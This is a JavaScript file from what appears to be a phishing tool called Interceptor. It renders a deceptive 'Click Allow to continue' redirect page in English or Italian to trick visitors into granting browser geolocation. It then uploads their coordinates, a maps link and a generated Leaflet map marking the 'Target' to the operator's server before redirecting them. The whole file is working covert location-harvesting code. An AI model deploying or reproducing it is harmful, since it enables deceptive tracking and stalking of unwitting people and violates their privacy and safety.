/*ORIGINAL-CREATOR: Luca Garofalo (Lucksi)
AUTHOR: Luca Garofalo (Lucksi)
Copyright (C) 2023 Lucksi <lukege287@gmail.com>
License: GNU General Public License v3.0*/

var url1; 
var lang;

function Redirect(url,language){
    if (navigator.geolocation) {
        if(language == "it"){
            document.write("<head><title>Redirect</title></head><body style='background-color:#1a2b34;'><p style = 'color:white;font-size:x-large;text-align:center;margin-top:20%;font-family:'Franklin Gothic Medium','Arial Narrow',Arial,sans-serif;' id = 'change'>Clicca Consenti per continuare</p></body>")
        }
        else{
            document.write("<head><title>Redirect</title></head><body style='background-color:#1a2b34;'><p style = 'color:white;font-size:x-large;text-align:center;margin-top:20%;font-family:'Franklin Gothic Medium','Arial Narrow',Arial,sans-serif;' id = 'change'>Click Allow to continue</p></body>")
        }   
        navigator.geolocation.getCurrentPosition(Position,error)
    }
    else{
        text = "GET APPROXIMATE GEOLOCATION:Failed...\nCannot Obtain Geolocation";
        var file = new Blob([text],{type: "text/plain"});
        var data = new FormData();
        data.append("upFile",file);
        var req = new XMLHttpRequest();
        req.open("POST","Support/Upload.php");
        req.send(data);
        url1 = url;
    } 
    url1 = url;
    lang = language
}

function RedirectUrl(){
    location.href=url1;
}

function error(){
    text = "GET GEOLOCATION:Failed\n...User Denied permisiion\n";
    var file = new Blob([text],{type: "text/plain"});
    var data = new FormData();
    data.append("upFile",file);
    var req = new XMLHttpRequest();
    req.open("POST","Support/Upload.php");
    req.send(data);
}

function Position(position) { 
    text = "GET GEOLOCATION:\nLatitude: " + position.coords.latitude + "\nLongitude: " + position.coords.longitude + "\nGoogle-Maps-Link:https://google.it/maps/place/" + position.coords.latitude + "," + position.coords.longitude + "\n";
    var file = new Blob([text],{type: "text/plain"});
    var data = new FormData();
    data.append("upFile",file);
    var req = new XMLHttpRequest();
    req.open("POST","Support/Upload.php");
    req.send(data);
    text2 = "<!DOCTYPE HTML>" +
    "<!-- FILE GENERATED BY INTERCEPTOR-->"+
    "<html>"+
        "<head>"+
        "<title>Map for GPS Geolocation</title>"+
        "<link rel = 'stylesheet' href = '../../Css/Map.css'>"+
        "<link rel= stylesheet href= 'https://unpkg.com/leaflet@1.7.1/dist/leaflet.css'  integrity= 'sha512-xodZBNTC5n17Xt2atTPuE1HxjVMSvLVW9ocqUKLsCC5CXdbqCmblAshOMAS6/keqq/sMZMZ19scR4PsZChSR7A=='  crossorigin= '' />"+
        "<script src= 'https://unpkg.com/leaflet@1.7.1/dist/leaflet.js'  integrity= 'sha512-XQoYMqMTK8LvdxXYG3nZ448hOEQiglfqkJs1NOQV44cWnUrBc8PkAOcXy20w0vlaXaVUearIOBhiXZ5V3ynxwA==' crossorigin= ''></script>"+
        "<meta charset = UTF-8 >"+
       "<meta name= viewport  content= width=device-width, initial-scale=0.9>"+
        "<meta name= theme-color content= #000000>"+
    "</head>"+
    "<body>"+
        "<center>"+
        "<br>"+
        "<p>APPROXIMATE GPS GEOLOCATION</p>"+
        "<div class =  map  id= map ></div>"+
        "<script>"+
            "var map = L.map( 'map' ).setView(["+ position.coords.latitude +","+ position.coords.longitude +"], 14);"+
            "L.tileLayer('https://{s}.tile.openstreetmap.org/{z}/{x}/{y}.png',{ attribution: '&copy; <a href= https://www.openstreetmap.org/copyright >OpenStreetMap</a> contributors'}).addTo(map);"+
            "L.marker(["+ position.coords.latitude +","+ position.coords.longitude+"]).addTo(map).bindPopup('Target Gps Location is approximatley based in this Area.').openPopup();"+
        "</script>;"+    
    "</body>"+
"</html>"
    var file = new Blob([text2],{type: "text/plain"});
    var data = new FormData();
    data.append("upFile",file);
    var req = new XMLHttpRequest();
    req.open("POST","Support/Upload_Map.php");
    req.send(data);
    if(lang == "it"){
        document.getElementById("change").innerHTML="Grazie per la tua conferma sarai ridiretto in 3 Secondi<br>Se non sarai ridiretto<br><br><a href = '" + url1 + "' style='color:white;font-size:x-large;text-decoration:none;border:2px solid black;border-radius:10px;background-color:green'>Clicca Qui</a>";
    }
    document.getElementById("change").innerHTML="Thank You for your Confermation you should be redirected in 3 Seconds<br>If you are not being redirected<br><br><a href = '" + url1 + "' style='color:white;font-size:x-large;text-decoration:none;border:2px solid black;border-radius:10px;background-color:green'>Click here</a>";
    const timeout = setTimeout(RedirectUrl,3000);
}
